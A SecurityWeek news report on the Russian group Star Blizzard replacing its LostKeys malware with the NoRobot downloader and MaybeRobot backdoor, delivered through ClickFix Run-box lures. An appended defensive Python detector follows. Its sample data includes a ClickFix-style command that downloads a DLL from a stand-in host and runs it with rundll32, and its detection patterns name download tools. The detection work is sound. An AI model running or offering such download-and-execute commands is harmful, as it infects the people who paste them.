Star Blizzard APT Adopts New Backdoor After LostKeys Malware Exposure

Published 2025-10-23 11:33:45 | www.securityweek.com

The Russian state-sponsored APT known as Star Blizzard has transitioned to a new backdoor, MaybeRobot, following the public disclosure of its LostKeys malware. The switch was made without abandoning the group's ClickFix-based infection technique, which it continues to aim at people connected to civil society and think tanks in Russia.

The Russian state-sponsored APT known as Star Blizzard has been using a new backdoor in attacks after its LostKeys malware was detailed in a public report in June, Google says. Also tracked as Callisto, ColdRiver, Seaborgium, and UNC4057, Star Blizzard has been active since at least 2019 and was publicly linked to Russia's Federal Security Service (FSB) by the US in December 2023.

In the June report, Google detailed how the APT was using the ClickFix technique to deliver the LostKeys malware as part of a multi-stage infection chain that also involved a first-stage PowerShell script. Within days of the report, Star Blizzard started using new malware families in attacks and never deployed LostKeys again, Google now says. The APT also dropped the PowerShell infection chain, opting instead to rely on the victim executing a malicious DLL via rundll32.

First documented by Zscaler in September, the recent Star Blizzard attacks continue to rely on ClickFix for infection: victims are lured to pages masquerading as information resources for members of civil society and think tanks in Russia and convinced to execute malicious commands in the Windows Run box. The commands result in a malicious DLL being downloaded to the victim's system. Dubbed NoRobot by Google (and BaitSwitch by Zscaler), the DLL is designed to retrieve the next-stage payload and achieve persistence.

Earlier versions of NoRobot, Google says, fetched a Python backdoor dubbed YesRobot, whose limited functionality made typical backdoor tasks cumbersome to implement. The APT therefore abandoned YesRobot in favor of a new backdoor, MaybeRobot (tracked as SimpleFix by Zscaler), also deployed via NoRobot. MaybeRobot is a heavily obfuscated PowerShell script that supports three operator-supplied commands: execute a file, execute a command, and execute a PowerShell block.

Likely built to replace YesRobot and offering more flexibility on infected systems, MaybeRobot nonetheless has minimal built-in functionality and still requires an operator for more complex operations. Between May and September 2025, Star Blizzard made multiple changes to NoRobot, mainly focused on evading detection, and updated its infection chain as it transitioned to deploying MaybeRobot as the final stage. "Over the course of this period of time, Coldriver simplified their malware infection chain and implemented basic evasion techniques, such as rotating infrastructure and file naming conventions, paths where files were retrieved from, how those paths were constructed, changing the export name and changing the DLL name," Google explains.

The practical consequence for defenders is that file-name, path and export-name indicators taken from any one sample age quickly. Detection of this chain is better anchored on the behaviour that persisted across the changes: a command entered in the Run box that fetches a DLL and executes it through rundll32.
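The infection chain and the evasion changes described above suggest a behaviour-based rule rather than a hash or file-name match. The following is an added example, not code from Google, Zscaler or SecurityWeek: it scores constructed process-creation events (Sysmon Event ID 1-style fields, simplified to parent image, image and command line; the field names are assumptions, not any vendor's schema) for a shell-launched command that downloads a file and hands a DLL in a user-writable directory to rundll32, and it triages the Run-box history that Windows keeps under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The `victim` profile path, the `invalid.example` host and the environment-variable map are constructed for the sample data.

```python
import re
from dataclasses import dataclass

# Directories a standard user can write to. The alert keys on "rundll32 loads a DLL
# from here, launched from the shell", not on file names, export names or URL paths,
# all of which the actor rotated according to the report.
USER_WRITABLE = re.compile(
    r"(?i)^[a-z]:\\(?:users\\[^\\]+\\(?:appdata|downloads|desktop|documents)"
    r"|programdata|windows\\temp|temp)\\"
)
# Download primitives typically chained in front of rundll32 in a ClickFix one-liner.
DOWNLOADERS = re.compile(
    r"(?i)\b(?:curl|bitsadmin|certutil|wget|iwr|invoke-webrequest|start-bitstransfer)\b"
)
# rundll32 <dll>[,<export>]  or  rundll32 <dll> <export>  (quoted DLL paths allowed;
# paths containing spaces are not handled by this simplified pattern).
RUNDLL_ARG = re.compile(
    r'(?i)rundll32(?:\.exe)?\s+"?([^",\s]+\.dll)"?(?:\s*,\s*|\s+)?(\S+)?'
)
# Assumed expansions for a constructed "victim" profile; a real pipeline would take
# these from the endpoint agent or the process token.
ENV = {
    "%TEMP%": r"C:\Users\victim\AppData\Local\Temp",
    "%APPDATA%": r"C:\Users\victim\AppData\Roaming",
    "%LOCALAPPDATA%": r"C:\Users\victim\AppData\Local",
    "%USERPROFILE%": r"C:\Users\victim",
}
SHELL_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe"}


@dataclass(frozen=True)
class ProcessEvent:
    parent_image: str
    image: str
    command_line: str


def expand_env(s):
    """Expand the assumed %VAR% values case-insensitively (lambda avoids backslash escapes)."""
    for var, val in ENV.items():
        s = re.sub(re.escape(var), lambda _m, v=val: v, s, flags=re.IGNORECASE)
    return s


def rundll32_target(cmdline):
    """Return (dll_path, export) for a rundll32 invocation in cmdline, or None."""
    m = RUNDLL_ARG.search(expand_env(cmdline))
    if not m:
        return None
    return m.group(1), m.group(2) or ""


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def score(ev):
    """Return the reasons this process-creation event matches the Run box -> rundll32 chain."""
    reasons = []
    image, parent = _basename(ev.image), _basename(ev.parent_image)
    tgt = rundll32_target(ev.command_line)
    if image == "rundll32.exe" and tgt:
        if USER_WRITABLE.match(tgt[0]):
            reasons.append("rundll32 loads a DLL from a user-writable path")
        if parent == "explorer.exe":
            reasons.append("rundll32 launched directly from the shell (Run box)")
    elif image in SHELL_HOSTS and parent == "explorer.exe" and tgt:
        if DOWNLOADERS.search(ev.command_line):
            reasons.append("shell-launched one-liner downloads a file and hands a DLL to rundll32")
        if USER_WRITABLE.match(tgt[0]):
            reasons.append("rundll32 loads a DLL from a user-writable path")
    return reasons


def runmru_commands(values):
    """Run-box history from the RunMRU key, newest first.
    Each value is '<command>\\1'; MRUList holds the value names in most-recent order."""
    out = []
    for name in values.get("MRUList", ""):
        raw = values.get(name)
        if raw is not None:
            out.append(raw[:-2] if raw.endswith("\\1") else raw)
    return out


def triage_runmru(values):
    """Run-box entries that both download something and invoke rundll32."""
    return [c for c in runmru_commands(values) if DOWNLOADERS.search(c) and rundll32_target(c)]


# Constructed sample data: two malicious-looking events and one benign rundll32 use.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Users\victim\AppData\Local\Temp\update.dll,Run"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
                 r"cmd /c curl -s https://invalid.example/f.dll -o %TEMP%\f.dll & rundll32 %TEMP%\f.dll,Go"),
    ProcessEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"),
]
SAMPLE_RUNMRU = {  # constructed export of the RunMRU key
    "MRUList": "ba",
    "a": "notepad\\1",
    "b": r"cmd /c curl -s https://invalid.example/f.dll -o %TEMP%\f.dll & rundll32 %TEMP%\f.dll,Go" + "\\1",
}

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev.command_line, "->", score(ev) or "benign")
    print("RunMRU hits:", triage_runmru(SAMPLE_RUNMRU))
```

The rule deliberately ignores what the DLL is called and which export is named, since both were rotated; it fires on the parent-child relationship (explorer.exe spawning a shell or rundll32), the user-writable load path and the download-then-execute pairing. The RunMRU check is a cheap forensic complement on a host where process telemetry was not yet enabled at infection time.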